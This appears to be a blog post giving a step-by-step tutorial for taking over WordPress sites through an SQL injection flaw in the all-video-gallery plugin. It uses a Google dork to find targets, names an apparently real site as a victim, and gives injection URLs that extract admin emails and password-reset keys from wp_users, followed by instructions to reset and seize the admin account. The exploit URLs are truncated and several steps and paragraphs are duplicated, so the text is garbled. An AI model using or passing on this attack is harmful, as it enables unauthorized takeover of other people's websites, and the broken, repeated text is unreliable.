What is Wordpress?
WordPress is a free and open source blogging tool and a content management syste (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.
Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli Vulnerability
1)First we will find a Target using a Google dork
inurl:all-video-gallery/config.php?vid=
2)Open any website.In my case its juangrial.com.
3)now lets do a sql injection.copy the exploit code then hit enter then see the Magic.
You can also try this.well Both will work the same
Exploit Code for finding usename &email:
http://site.com/wp-content/plugins/all-v…,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,
39,40,41+from+wp_users-
4)We Got admin Email.Now Let!s reset it.
For that GO to> http://Ursite.com/wp-admin OR https://site.com/wp-login.php
(Then click on Lost Password)
5)Enter the Email we Got IN earlier steps
6)Now come back and go to activation table
* Exploit Code for activation Key*
http://Ursite.com/wp-content/plugins/all-v…,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users–
7)we got what we need now lets change the admin password
goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8)Now open http://Ursite.com/wp-admin
and Login with new password
Exploit Code for finding usename &email:
http://site.com/wp-content/plugins/all-v…,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,
39,40,41+from+wp_users-
4)We Got admin Email.Now Let!s reset it.
For that GO to> http://Ursite.com/wp-admin OR https://site.com/wp-login.php
(Then click on Lost Password)
5)Enter the Email we Got IN earlier steps
6)Now come back and go to activation table
* Exploit Code for activation Key*
http://Ursite.com/wp-content/plugins/all-v…,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users–
7)we got what we need now lets change the admin password
goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8)Now open http://Ursite.com/wp-admin
and Login with new password
No comments:
Post a Comment